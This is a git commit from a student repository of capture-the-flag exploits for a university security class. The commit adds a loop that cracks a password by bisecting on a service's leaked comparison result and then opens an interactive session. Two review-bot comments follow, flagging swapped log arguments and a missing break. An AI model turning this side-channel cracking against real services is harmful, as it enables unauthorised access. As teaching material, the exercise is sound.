ucdavis-ecs189m

[RADIOACTIVE] python exploits for uc davis class ecs189m
git clone git://git.figbert.com/ucdavis-ecs189m.git

commit 24ca40b1505424367bc65d8ebff4c8675ee83a23
parent b79f41c7bb49de00367b88be90d20dfa6fa7e12f
Author: therealFIGBERT <figbertwelner@gmail.com>
Date:   Sat, 12 Oct 2019 11:25:56 -0700

Implementing second stage passcracking

Diffstat:
Mthird_flag.py | 25++++++++++++++++++++++---
1 file changed, 22 insertions(+), 3 deletions(-)

diff --git a/third_flag.py b/third_flag.py
@@ -53,7 +53,7 @@ while not cracked:
 break
 print("Server response:\n{}\n".format(response))
 conn.sendline(password)
- print("Attempt {}:\nPass sent as:\n{}\nPrevious Pass: {}\nCurrent low:\n{}\nCurrent high:\n{}\n".format(attempt, previous_pass, password, LO, HI))
+ print("Attempt {}:\nPass sent as:\n{}\nPrevious Pass:\n{}\nCurrent low:\n{}\nCurrent high:\n{}\n".format(attempt, previous_pass, password, LO, HI))
 attempt += 1
 start_pos = 0
 for b in range(len(LO)):
@@ -62,4 +62,23 @@ for b in range(len(LO)):
 else:
 break
 pass_buffer = password[:start_pos]
-pass_end = password[start_pos:]
-\ No newline at end of file
+HI = HI[start_pos:]
+LO = LO[start_pos:]
+first = True
+while not cracked:
+ previous_pass = password
+ if b" -1 " in response:
+ LO = password[start_pos:]
+ password = pass_buffer + passgen(LO, HI)
+ elif b" 1 " in response:
+ HI = password[start_pos:]
+ password = pass_buffer + passgen(LO, HI)
+ else:
+ print("Password cracked as: {}".format(password))
+ cracked = True
+ conn.interactive()
+ conn.sendline(password)
+ print("Attempt {}:\nPass sent as:\n{}\nPrevious Pass: {}\nCurrent low:\n{}\nCurrent high:\n{}\n".format(attempt, previous_pass, password, LO, HI))
+ response = conn.recvline_contains(b"strcmp")
+ print("Server response:\n{}\n".format(response))
+ attempt += 1
+\ No newline at end of file
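Review bot: The labels and arguments of the status print in the first hunk appear swapped: `Pass sent as` is filled with `previous_pass` and `Previous Pass` with `password`, although `password` is the value `conn.sendline` has just sent. Reordering the call to `.format(attempt, password, previous_pass, LO, HI)` would make the log match the traffic. The copy of this print added in the second hunk has the same argument order and still uses the old `Previous Pass: {}` layout, so the two loops log in different formats. The enclosing `while not cracked:` loop starts outside the hunk.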
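Review bot: The `else:` branch of the loop added in the second hunk sets `cracked = True` and calls `conn.interactive()`, but control then falls through to `conn.sendline(password)` and `conn.recvline_contains(b"strcmp")` on a connection whose state is unknown once the interactive session returns. A `break` directly after `conn.interactive()` would end the loop at that point. `first = True` is assigned but never read in the visible lines, so it is either dead or belongs to code outside this hunk. For readers studying the exercise: the loop can only narrow `LO` and `HI` because the service appears to echo the signed result of its comparison, and a service that reports only match or no-match would give it nothing to bisect on.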